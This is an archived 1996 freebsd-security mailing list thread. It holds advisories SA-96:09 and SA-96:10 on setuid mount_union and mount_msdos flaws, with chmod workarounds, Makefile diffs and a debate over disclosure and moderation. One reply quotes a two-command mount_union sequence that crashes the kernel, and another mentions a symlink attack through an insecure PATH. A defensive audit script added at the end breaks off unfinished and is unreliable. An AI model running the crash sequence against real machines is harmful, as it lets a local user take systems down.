== Chris Layne ======================================== Nervosa Computing == == coredump@nervosa.com ================ http://www.nervosa.com/~coredump == ----- End of forwarded message from invalid opcode ----- -- angio@aros.net Complete virtual hosting and business-oriented system administration Internet services. (WWW, FTP, email) http://www.aros.net/ http://www.aros.net/about/virtual "There are only two industries that refer to thier customers as 'users'." From owner-freebsd-security Fri May 17 17:07:46 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id RAA03173 for security-outgoing; Fri, 17 May 1996 17:07:46 -0700 (PDT) Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id RAA03132; Fri, 17 May 1996 17:06:53 -0700 (PDT) Message-Id: <199605180006.RAA03132@freefall.freebsd.org> To: freebsd-security-notifications@freebsd.org, freebsd-announce@freebsd.org cc: freebsd-security@freebsd.org From: FreeBSD Security Officer Reply-To: security-officer@freebsd.org Subject: FreeBSD Security Advisory: FreeBSD-SA-96:09.vfsload Date: Fri, 17 May 1996 16:30:52 -0700 Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-96:09 Security Advisory The FreeBSD Project, Inc. Topic: unauthorized access via mount_union / mount_msdos (vfsload) Category: core Module: libc Announced: 1996-05-17 Affects: FreeBSD 2.0, 2.0.5, 2.1, 2.1-stable, and 2.2-current Corrected: 1996-05-17 2.1-stable and 2.2-current sources Source: FreeBSD native bug FreeBSD only: yes Patches: ftp://freebsd.org/pub/CERT/patches/SA-96:09/ ============================================================================= I. Background A bug was found in the vfsload(3) library call that affects all versions of FreeBSD from 2.0 through 2.2-CURRENT that caused a system vulnerability. 
This problem is present in all source code and binary distributions of FreeBSD version 2.x released before 1996-05-18. The FreeBSD project is aware of active exploits of this vulnerability. All FreeBSD users are encouraged to use the workaround provided until they can update their operating system to a version with this vulnerability fixed. II. Problem Description The mount_union and mount_msdos programs invoke another system utility in an insecure fashion while setuid root. III. Impact The problem could allow local users to gain unauthorized permissions. This vulnerability can only be exploited by users with a valid account on the local system. IV. Solution(s) Update operating system sources and binaries to FreeBSD 2.1-stable or FreeBSD 2.2-current as distributed later than 1996-05-18 or if you are currently running 2.1 or later, you may apply the solution patches available at the URL listed at the top of this message. The OS updates fix the actual problem in the vfsload(3) library routine. Once the vfsload() library routine is fixed, the workaround listed below is not necessary to solve this problem. However, an additional stability problem has come to light (ref. FreeBSD SA-96:10) so the FreeBSD project suggests using both the setuid workaround and the solution for best results. V. Workaround This vulnerability can quickly and easily be limited by removing the setuid permission bit from the mount_union and mount_msdos program. This workaround will work for all versions of FreeBSD affected by this problem. As root, execute the command: % chmod u-s /sbin/mount_union /sbin/mount_msdos then verify that the setuid permissions of the files have been removed. 
The permissions array should read "-r-xr-xr-x" as shown here: % ls -l /sbin/mount_union /sbin/mount_msdos -r-xr-xr-x 1 root bin 151552 Apr 26 04:41 /sbin/mount_msdos -r-xr-xr-x 1 root bin 53248 Apr 26 04:40 /sbin/mount_union In addition to changing the permissions on the executable files, if you have the source code installed, we suggest patching the sources so that mount_union will not be installed with the setuid bit set: *** /usr/src/sbin/mount_union/Makefile Sun Nov 20 14:47:52 1994 - --- /usr/src/sbin/mount_union/Makefile Fri May 17 10:36:09 1996 *************** *** 8,14 **** CFLAGS+= -I${.CURDIR}/../../sys -I${MOUNT} .PATH: ${MOUNT} - - BINOWN= root - - BINMODE=4555 - - .include - --- 8,11 ---- *** /usr/src/sbin/i386/mount_msdos/Makefile Sun Dec 4 00:01:24 1994 - --- /usr/src/sbin/i386/mount_msdos/Makefile Fri May 17 11:31:57 1996 *************** *** 6,14 **** SRCS= mount_msdos.c getmntopts.c MAN8= mount_msdos.8 - - BINOWN= root - - BINMODE= 4555 - - MOUNT= ${.CURDIR}/../../mount CFLAGS+= -I${MOUNT} .PATH: ${MOUNT} - --- 6,11 ---- ============================================================================= The FreeBSD Project, Inc. Web Site: http://www.freebsd.com/ Confidential contacts: security-officer@freebsd.org PGP Key: ftp://freebsd.org/pub/CERT/public_key.asc Security notifications: security-notifications@freebsd.org Security public discussion: security@freebsd.org Notice: Any patches in this document may not apply cleanly due to modifications caused by digital signature or mailer software. Please reference the URL listed at the top of this document for original copies of all patches if necessary. 
=============================================================================

From owner-freebsd-security Fri May 17 17:09:02 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id RAA03368 for security-outgoing; Fri, 17 May 1996 17:09:02 -0700 (PDT)
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id RAA03326; Fri, 17 May 1996 17:08:07 -0700 (PDT)
Message-Id: <199605180008.RAA03326@freefall.freebsd.org>
To: freebsd-security-notifications@freebsd.org, freebsd-announce@freebsd.org
cc: security@freebsd.org
From: FreeBSD Security Officer
Reply-To: security-officer@freebsd.org
Subject: FreeBSD Security Advisory: FreeBSD-SA-96:10.mount_union
Date: Fri, 17 May 1996 16:35:40 -0700
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

This is the second of two related security advisory notices.

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-96:10                                           Security Advisory
                                                       The FreeBSD Project, Inc.

Topic:          system stability compromise via mount_union program
Category:       core
Module:         unionfs
Announced:      1996-05-17
Affects:        FreeBSD 2.0, 2.0.5, 2.1, 2.1-stable, and 2.2-current
Corrected:      (workaround) 2.1-stable and 2.2-current as of 1996-05-17
Source:         4.4BSD (lite)
FreeBSD only:   no
Patches:        ftp://freebsd.org/pub/CERT/patches/SA-96:10/
=============================================================================

I. Background

A bug was found in the union file system code which can allow an unprivileged local user to compromise system stability.
This problem is present in all source code and binary distributions of FreeBSD version 2.x released before 1996-05-18. All FreeBSD users are encouraged to use the workaround provided until the FreeBSD Project distributes a full solution.

II. Problem Description

The union filesystem code had problems with certain mount ordering problems. By executing a certain sequence of mount_union commands, an unprivileged local user may cause a system reload.

NOTE: This is a different problem than the one discussed in FreeBSD SA-96:09. The workaround for this vulnerability is similar to the one discussed in 96:09, but the proper solution for the unauthorized access problem in 96:09 does not address this vulnerability.

III. Impact

The problem could allow local users to compromise system stability. This vulnerability can only be exploited by users with a valid account on the local system.

IV. Solution(s)

The FreeBSD project is currently developing a solution to this problem; however, the proper solution will not be available until a future FreeBSD release. We do not anticipate releasing patches for previous versions of FreeBSD due to the extensive nature of this fix. This security advisory will be updated as new information is made available.

V. Workaround

This vulnerability can quickly and easily be limited by removing the setuid permission bit from the mount_union program. This workaround will work for all versions of FreeBSD affected by this problem.

As root, execute the command:

  % chmod u-s /sbin/mount_union

then verify that the setuid permissions of the files have been removed.
The permissions array should read "-r-xr-xr-x" as shown here:

  % ls -l /sbin/mount_union
  -r-xr-xr-x  1 root  bin  53248 Apr 26 04:40 /sbin/mount_union

In addition to changing the permissions on the executable files, if you have the source code installed, we suggest patching the sources so that mount_union will not be installed with the setuid bit set:

*** /usr/src/sbin/mount_union/Makefile Sun Nov 20 14:47:52 1994 - --- /usr/src/sbin/mount_union/Makefile Fri May 17 10:36:09 1996 *************** *** 8,14 **** CFLAGS+= -I${.CURDIR}/../../sys -I${MOUNT} .PATH: ${MOUNT} - - BINOWN= root - - BINMODE=4555 - - .include - --- 8,11 ----

=============================================================================
The FreeBSD Project, Inc.          Web Site: http://www.freebsd.com/
Confidential contacts:             security-officer@freebsd.org
PGP Key:                           ftp://freebsd.org/pub/CERT/public_key.asc
Security notifications:            security-notifications@freebsd.org
Security public discussion:        security@freebsd.org

Notice: Any patches in this document may not apply cleanly due to modifications caused by digital signature or mailer software. Please reference the URL listed at the top of this document for original copies of all patches if necessary.
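Review bot: this mount_union Makefile hunk is identical to the one shipped with SA-96:09 above (same file timestamps, same `*** 8,14 ****` / `--- 8,11 ----` ranges and the same three removed lines), so on a tree already patched for 96:09, patch(1) will report it as already applied and offer to reverse it; the advisory should say that this is expected and that the answer is to keep the existing change, rather than leave the reader to interpret the prompt. As in 96:09, the `- -` prefixes on the removed lines are PGP dash-escaping, not part of the diff.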
=============================================================================

From owner-freebsd-security Fri May 17 17:36:09 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id RAA05147 for security-outgoing; Fri, 17 May 1996 17:36:09 -0700 (PDT)
Received: from nervosa.com (root@nervosa.com [192.187.228.86]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id RAA05098; Fri, 17 May 1996 17:36:00 -0700 (PDT)
Received: from onyx.nervosa.com (coredump@onyx.nervosa.com [10.0.0.1]) by nervosa.com (8.7.5/8.7.3) with SMTP id RAA26309; Fri, 17 May 1996 17:35:31 -0700 (PDT)
Date: Fri, 17 May 1996 17:35:30 -0700 (PDT)
From: invalid opcode
To: Garrett Wollman
cc: Paul Traina, "Jordan K. Hubbard", davidg@Root.COM, "Jordan K. Hubbard", committers@freefall.freebsd.org, security@freebsd.org
Subject: Re: cvs commit: src/sbin Makefile
In-Reply-To: <9605171821.AA05895@halloran-eldar.lcs.mit.edu>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On Fri, 17 May 1996, Garrett Wollman wrote:

> mount_msdos is also affected. All of the mount_* programs can be
> affected if `root' has an insecure path and attempts to mount a
> filesystem type not already in the kernel.
> -GAWollman

mount_msdos always returned an EPERM, so I assume it may be vulnerable but not possible to exploit?
== Chris Layne ======================================== Nervosa Computing ==
== coredump@nervosa.com ================ http://www.nervosa.com/~coredump ==

From owner-freebsd-security Fri May 17 19:22:43 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id TAA11697 for security-outgoing; Fri, 17 May 1996 19:22:43 -0700 (PDT)
Received: from neptune.pristine.com.tw ([192.72.150.2]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id TAA11685; Fri, 17 May 1996 19:22:29 -0700 (PDT)
Received: (from team_fbf@localhost) by neptune.pristine.com.tw (8.6.11/8.6.9) id KAA17233; Sat, 18 May 1996 10:21:47 GMT
From: ywliu
Message-Id: <199605181021.KAA17233@neptune.pristine.com.tw>
Subject: Re: very bad
To: jkh@time.cdrom.com (Jordan K. Hubbard)
Date: Sat, 18 May 1996 10:21:47 +0000 ()
Cc: coredump@nervosa.com, freebsd-security@freebsd.org, security-officer@freebsd.org
In-Reply-To: <13470.832320504@time.cdrom.com> from "Jordan K. Hubbard" at May 17, 96 01:08:24 am
X-Mailer: ELM [version 2.4 PL24]
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

>
> You know though, for ones this bad I'd really rather you sent the
> message to security-officer@freebsd.org rather than freebsd-security

I believe not so many of us know this e-mail address. We need to make it easy to see in the handbook or FAQ.
Yen-Wei Liu

From owner-freebsd-security Fri May 17 19:24:36 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id TAA11857 for security-outgoing; Fri, 17 May 1996 19:24:36 -0700 (PDT)
Received: from neptune.pristine.com.tw ([192.72.150.2]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id TAA11851 for ; Fri, 17 May 1996 19:24:30 -0700 (PDT)
Received: (from team_fbf@localhost) by neptune.pristine.com.tw (8.6.11/8.6.9) id KAA17289; Sat, 18 May 1996 10:24:02 GMT
From: ywliu
Message-Id: <199605181024.KAA17289@neptune.pristine.com.tw>
Subject: Re: very bad
To: vjojic@EUnet.yu (Vladimir Jojic)
Date: Sat, 18 May 1996 10:24:01 +0000 ()
Cc: freebsd-security@freebsd.org
In-Reply-To: <199605171009.MAA00475@EUnet.yu> from "Vladimir Jojic" at May 17, 96 12:09:30 pm
X-Mailer: ELM [version 2.4 PL24]
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

>
> I am not very familiar with mailing list programs, but there is possible
> improvement (if it isn't yet done):
>
> - add special class of mailing list, such as security list

I suggest we should make freebsd-security a moderated mailing list. So the moderator can filter the information before it is sent out.

Yen-Wei Liu

From owner-freebsd-security Fri May 17 19:29:25 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id TAA12256 for security-outgoing; Fri, 17 May 1996 19:29:25 -0700 (PDT)
Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id TAA12249; Fri, 17 May 1996 19:29:20 -0700 (PDT)
Received: from localhost (localhost [127.0.0.1]) by time.cdrom.com (8.7.5/8.6.9) with SMTP id TAA08771; Fri, 17 May 1996 19:28:58 -0700 (PDT)
To: kduling@natasha.scccc.com (Kevin J. Duling)
cc: owner-freebsd-security@freefall.freebsd.org (Glen Foster), coredump@nervosa.com, freebsd-security@freebsd.org
Subject: Re: very bad
In-reply-to: Your message of "Fri, 17 May 1996 10:16:36 MDT." <199605171616.KAA15759@natasha.scccc.com>
Date: Fri, 17 May 1996 19:28:57 -0700
Message-ID: <8769.832386537@time.cdrom.com>
From: "Jordan K. Hubbard"
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

> If you don't announce the bugs, then the crackers learn them while the
> admins are left in ignorance. You're not going to find a forum where
> you know you're only telling "the right people" about the problem.

I don't disagree in principle, but I still think that a slavish adherence to either a "don't tell anything" or "tell everyone" philosophy is a mistake, and each situation should be handled on a case by case basis. In some cases you're informing the populace of a very important piece of information and in others you're simply handing the baby a blasting cap to play with.

Jordan

From owner-freebsd-security Fri May 17 20:15:52 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id UAA15641 for security-outgoing; Fri, 17 May 1996 20:15:52 -0700 (PDT)
Received: from gallup.cia-g.com (root@gallup.cia-g.com [206.206.162.10]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id UAA15636 for ; Fri, 17 May 1996 20:15:48 -0700 (PDT)
Received: from gallup.cia-g.com (gallup.cia-g.com [206.206.162.10]) by gallup.cia-g.com (8.6.11/8.6.9) with SMTP id VAA30204; Fri, 17 May 1996 21:16:16 -0600
Date: Fri, 17 May 1996 21:16:15 -0600 (MDT)
From: Stephen Fisher
To: ywliu
cc: Vladimir Jojic, freebsd-security@freebsd.org
Subject: Re: very bad
In-Reply-To: <199605181024.KAA17289@neptune.pristine.com.tw>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

I'll second that.
On Sat, 18 May 1996, ywliu wrote:

> >
> > I am not very familiar with mailing list programs, but there is possible
> > improvement (if it isn't yet done):
> >
> > - add special class of mailing list, such as security list
>
> I suggest we should make freebsd-security a moderated mailing list. So the
> moderator can filter the information before it is sent out.
>
> Yen-Wei Liu
>

From owner-freebsd-security Fri May 17 20:31:53 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id UAA18155 for security-outgoing; Fri, 17 May 1996 20:31:53 -0700 (PDT)
Received: from mail.barrnet.net (mail.barrnet.net [131.119.246.7]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id UAA18144; Fri, 17 May 1996 20:31:44 -0700 (PDT)
Received: from apocalypse.superlink.net (apocalypse.superlink.net [205.246.27.150]) by mail.barrnet.net (8.7.5/MAIL-RELAY-LEN) with ESMTP id UAA18992; Fri, 17 May 1996 20:31:38 -0700 (PDT)
Received: (from marxx@localhost) by apocalypse.superlink.net (8.7.5/8.7.3) id TAA01275; Fri, 17 May 1996 19:40:11 -0400 (EDT)
Date: Fri, 17 May 1996 19:40:10 -0400 (EDT)
From: "Charles C. Figueiredo"
To: FreeBSD Security Officer
cc: freebsd-security-notifications@FreeBSD.ORG, freebsd-announce@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-96:09.vfsload
In-Reply-To: <199605172330.QAA02390@precipice.shockwave.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

Most of the mount code that uses vfs module management routines is going to have to be greatly changed to fix the problem, not just that patch; my other post suggests ways.

Marxx

"I don't want to grow up, I'm a BSD kid. There's so many toys in /usr/bin that I can play with!"

------------------------------------------------------------------------------
Charles C. Figueiredo                Marxx                marxx@superlink.net
------------------------------------------------------------------------------

From owner-freebsd-security Fri May 17 20:37:02 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id UAA18914 for security-outgoing; Fri, 17 May 1996 20:37:02 -0700 (PDT)
Received: from godzilla.zeta.org.au (godzilla.zeta.org.au [203.2.228.19]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id UAA18900 for ; Fri, 17 May 1996 20:36:54 -0700 (PDT)
Received: (from bde@localhost) by godzilla.zeta.org.au (8.6.12/8.6.9) id NAA18119; Sat, 18 May 1996 13:32:10 +1000
Date: Sat, 18 May 1996 13:32:10 +1000
From: Bruce Evans
Message-Id: <199605180332.NAA18119@godzilla.zeta.org.au>
To: coredump@nervosa.com, kato@eclogite.eps.nagoya-u.ac.jp
Subject: Re: BoS: SECURITY BUG in FreeBSD (fwd)
Cc: freebsd-security@FreeBSD.ORG
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

>> mount_union ~/a ~/b
>> mount_union -b ~/a ~/b

>My FreeBSD-current (I supped sources on May 17.) box crashed just
>after `mount_union -b ~/a ~/b' operation. Stack trace shows:

>_ufs_ihashget: recursive lock not expected -- pid 188 <--- mount_union

That's another problem with mount_union :-(. Somehow it hasn't crashed here yet after I ran the above and `mount_union ~/c ~/d' to test this and wasn't able to unmount them. Now I remember how to unmount them: run `mount' to see what is mounted and then unmount the name in the device column: `umount ""'.

Another problem with mount_union is that getdirentries() doesn't work for the lkm version. I have the union file system statically configured to test it. This may have helped avoid the above panic. It normally hangs instead of panicking.
Bruce

From owner-freebsd-security Fri May 17 20:58:01 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id UAA20797 for security-outgoing; Fri, 17 May 1996 20:58:01 -0700 (PDT)
Received: from mail.barrnet.net (mail.barrnet.net [131.119.246.7]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id UAA20792 for ; Fri, 17 May 1996 20:57:58 -0700 (PDT)
Received: from io.org (io.org [198.133.36.1]) by mail.barrnet.net (8.7.5/MAIL-RELAY-LEN) with SMTP id UAA19013 for ; Fri, 17 May 1996 20:57:56 -0700 (PDT)
Received: from zap.io.org (taob@zap.io.org [198.133.36.81]) by io.org (8.6.12/8.6.12) with SMTP id XAA11148 for ; Fri, 17 May 1996 23:53:13 -0400
Date: Fri, 17 May 1996 23:52:11 -0400 (EDT)
From: Brian Tao
To: FREEBSD-SECURITY-L
Subject: Re: very bad (fwd)
In-Reply-To: <199605180004.SAA01785@shell.aros.net>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

> ----- Forwarded message from invalid opcode -----
>
> Too bad it's already on BUGTRAQ and BoS which is way more than 1000 :-(

BTW, what are the subscribe addresses to those two lists?
--
Brian Tao (BT300, taob@io.org, taob@ican.net)
Systems and Network Administrator, Internet Canada Corp.
"Though this be madness, yet there is method in't"

From owner-freebsd-security Fri May 17 20:58:55 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id UAA20869 for security-outgoing; Fri, 17 May 1996 20:58:55 -0700 (PDT)
Received: from rover.village.org (rover.village.org [204.144.255.49]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id UAA20856 for ; Fri, 17 May 1996 20:58:51 -0700 (PDT)
Received: from localhost (localhost [127.0.0.1]) by rover.village.org (8.7.5/8.6.6) with SMTP id VAA12168; Fri, 17 May 1996 21:58:35 -0600 (MDT)
Message-Id: <199605180358.VAA12168@rover.village.org>
To: Jeff Hupp
Subject: Re: very bad
Cc: freebsd-security@FreeBSD.org
In-reply-to: Your message of Fri, 17 May 1996 16:51:27 CDT
Date: Fri, 17 May 1996 21:58:35 -0600
From: Warner Losh
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

: Security through obscurity does not work. Spreading the word far
: and wide is the only hope of getting the word in all the right hands. If it
: gets out at all it will end up in the wrong hand.

I know seeing the problem here strongly motivated me to fix all the machines in the village that had this problem pronto. I appreciate finding out about it.
Warner

From owner-freebsd-security Fri May 17 21:05:20 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id VAA21507 for security-outgoing; Fri, 17 May 1996 21:05:20 -0700 (PDT)
Received: from rover.village.org (rover.village.org [204.144.255.49]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id VAA21494 for ; Fri, 17 May 1996 21:05:14 -0700 (PDT)
Received: from localhost (localhost [127.0.0.1]) by rover.village.org (8.7.5/8.6.6) with SMTP id WAA12186 for ; Fri, 17 May 1996 22:05:12 -0600 (MDT)
Message-Id: <199605180405.WAA12186@rover.village.org>
To: freebsd-security@FreeBSD.org
Subject: Re: very bad
In-reply-to: Your message of Sat, 18 May 1996 10:24:01 -0000
Date: Fri, 17 May 1996 22:05:11 -0600
From: Warner Losh
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

: I suggest we should make freebsd-security a moderated mailing list. So the
: moderator can filter the information before it is sent out.

I *STRONGLY* disagree. People have shown good judgement here on the whole and one minor borderline case shouldn't force this change. True it was Friday night in Au and NZ, but it was the middle of the day here and it got a lot of people motivated to quickly "fix" the problem with the chmod, myself included.

Until such time as this list regularly discloses information about problems in an irresponsible manner, the status quo is good enough.

BTW, I would highly recommend people subscribe to BOS. It has lots of even more explicit and dangerous goodies that get posted from time to time.
Warner

From owner-freebsd-security Fri May 17 21:17:37 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id VAA22315 for security-outgoing; Fri, 17 May 1996 21:17:37 -0700 (PDT)
Received: from bdd.net ([207.61.78.33]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id VAA22310 for ; Fri, 17 May 1996 21:17:34 -0700 (PDT)
Received: from localhost (james@localhost) by bdd.net (8.7.5/8.7.3) with SMTP id AAA02356; Sat, 18 May 1996 00:17:26 -0400 (EDT)
Date: Sat, 18 May 1996 00:17:24 -0400 (EDT)
From: James FitzGibbon
To: Glen Foster
cc: security@FreeBSD.org
Subject: Re: cvs commit: src/sbin Makefile
In-Reply-To: <199605171948.PAA00619@ptavv.nsta.org>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

On Fri, 17 May 1996, Glen Foster wrote:

> How about rather than changing the Makefile to not install suid, the
> full path of modload be referenced in the source. Preserves the suid
> functionality and defeats the symlink attack.

Alternatively, the union fs could be set as only available statically, couldn't it? If it didn't try to load an lkm, modload would never be referenced, by relative or absolute path.

--
j.
----------------------------------------------------------------------------
| James FitzGibbon                                      james@nexis.net     |
| Integrator, The Nexis Group                  Voice/Fax : 416 410-0100     |
----------------------------------------------------------------------------

From owner-freebsd-security Sat May 18 00:02:06 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id AAA02677 for security-outgoing; Sat, 18 May 1996 00:02:06 -0700 (PDT)
Received: from nervosa.com (root@nervosa.com [192.187.228.86]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id AAA02671 for ; Sat, 18 May 1996 00:02:01 -0700 (PDT)
Received: from onyx.nervosa.com (coredump@onyx.nervosa.com [10.0.0.1]) by nervosa.com (8.7.5/8.7.3) with SMTP id AAA27943; Sat, 18 May 1996 00:01:54 -0700 (PDT)
Date: Sat, 18 May 1996 00:01:53 -0700 (PDT)
From: invalid opcode
To: Brian Tao
cc: FREEBSD-SECURITY-L
Subject: Re: very bad (fwd)
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Fri, 17 May 1996, Brian Tao wrote:

> BTW, what are the subscribe addresses to those two lists?
> Brian Tao (BT300, taob@io.org, taob@ican.net)

From what I remember you send an email to LISTSERV@NETSPACE.ORG with the body of SUBSCRIBE BUGTRAQ.
== Chris Layne ======================================== Nervosa Computing ==
== coredump@nervosa.com ================ http://www.nervosa.com/~coredump ==

From owner-freebsd-security Sat May 18 12:53:53 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id MAA16623 for security-outgoing; Sat, 18 May 1996 12:53:53 -0700 (PDT)
Received: from multivac.orthanc.com (root@multivac.orthanc.com [206.12.238.2]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id MAA16617 for ; Sat, 18 May 1996 12:53:48 -0700 (PDT)
Received: from orodruin.orthanc.com (root@orodruin.orthanc.com [206.12.238.3]) by multivac.orthanc.com (8.7.5/8.7.3) with ESMTP id MAA19426 for ; Sat, 18 May 1996 12:53:21 -0700 (PDT)
Received: from localhost (lyndon@localhost) by orodruin.orthanc.com (8.7.5/8.7.3) with SMTP id MAA09696 for ; Sat, 18 May 1996 12:53:37 -0700 (PDT)
Message-Id: <199605181953.MAA09696@orodruin.orthanc.com>
X-Authentication-Warning: orodruin.orthanc.com: lyndon owned process doing -bs
X-Authentication-Warning: orodruin.orthanc.com: Host lyndon@localhost didn't use HELO protocol
From: Lyndon Nerenberg VE7TCP
To: freebsd-security@freebsd.org
Subject: Re: very bad
In-reply-to: Your message of "Fri, 17 May 1996 22:05:11 MDT." <199605180405.WAA12186@rover.village.org>
Date: Sat, 18 May 1996 12:53:36 -0700
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

>>>>> "Warner" == Warner Losh writes:

    Warner> force this change. True it was Friday night in Au and NZ,
    Warner> but it was the middle of the day here and it got a lot of
    Warner> people motivated to quickly "fix" the problem with the
    Warner> chmod, myself included.

We all have to remember that it will *always* be the middle of the night *somewhere* when a security announcement is sent out. This is a _global_ network, folks.
--lyndon

From owner-freebsd-security Sat May 18 13:05:44 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id NAA17423 for security-outgoing; Sat, 18 May 1996 13:05:44 -0700 (PDT)
Received: from precipice.shockwave.com (precipice.shockwave.com [171.69.108.33]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id NAA17416 for ; Sat, 18 May 1996 13:05:39 -0700 (PDT)
Received: from shockwave.com (localhost.shockwave.com [127.0.0.1]) by precipice.shockwave.com (8.7.5/8.7.3) with ESMTP id NAA06811; Sat, 18 May 1996 13:04:00 -0700 (PDT)
Message-Id: <199605182004.NAA06811@precipice.shockwave.com>
To: ywliu
cc: vjojic@EUnet.yu (Vladimir Jojic), freebsd-security@FreeBSD.ORG
Subject: Re: very bad
In-reply-to: Your message of "Sat, 18 May 1996 10:24:01 -0000." <199605181024.KAA17289@neptune.pristine.com.tw>
Date: Sat, 18 May 1996 13:03:59 -0700
From: Paul Traina
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

  From: ywliu
  Subject: Re: very bad
  I suggest we should make freebsd-security a moderated mailing list. So the
  moderator can filter the information before it is sent out.

Then it will just show up elsewhere. There's freebsd-security-notifications which is a moderated mailing list for announcements. This allows admins who wish to not receive discussion mail to subscribe.
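An added example, not part of any message in this thread or of the FreeBSD source tree: a POSIX shell script that checks and applies the setuid workaround from SA-96:09 and SA-96:10 above, verifying the "-r-xr-xr-x" mode string the advisories tell the reader to expect, and that audits a PATH string for the relative or world-writable entries behind Garrett Wollman's remark about root having an "insecure path" when a mount_* program goes looking for modload. The file names passed to the functions and the PATH string are whatever the caller supplies; only the two helper paths in the `--run` branch come from the advisories.

```sh
#!/bin/sh
# Added example; not from the advisories or the FreeBSD source tree. Audits
# the two conditions the thread discusses: the setuid bit on the mount helpers
# named in FreeBSD-SA-96:09/96:10, and PATH entries that a setuid program
# searching PATH for a helper such as modload should never be exposed to.
# Only ls(1), cut(1) and chmod(1) are used, as in the advisories' own steps.

# mode_string FILE -> the 10-character permission field of "ls -ld", e.g.
# "-r-xr-xr-x", which is the string the advisories tell the reader to verify.
mode_string() {
    ls -ld "$1" 2>/dev/null | cut -c1-10
}

# is_setuid FILE -> exit 0 if the owner-execute slot shows s or S.
is_setuid() {
    case "$(mode_string "$1")" in
        ???[sS]??????) return 0 ;;
        *)             return 1 ;;
    esac
}

# audit_setuid FILE... -> report each file; exit 0 only if none is setuid.
# A missing file is reported and skipped (mount_msdos is i386-only).
audit_setuid() {
    bad=0
    for f in "$@"; do
        if [ ! -e "$f" ]; then
            printf '%s: not installed\n' "$f"
        elif is_setuid "$f"; then
            printf '%s: %s  SETUID, workaround not applied\n' "$f" "$(mode_string "$f")"
            bad=1
        else
            printf '%s: %s  ok\n' "$f" "$(mode_string "$f")"
        fi
    done
    return $bad
}

# apply_workaround FILE... -> "chmod u-s" each setuid file, then re-run the
# audit, which is the advisories' "verify that the setuid permissions have
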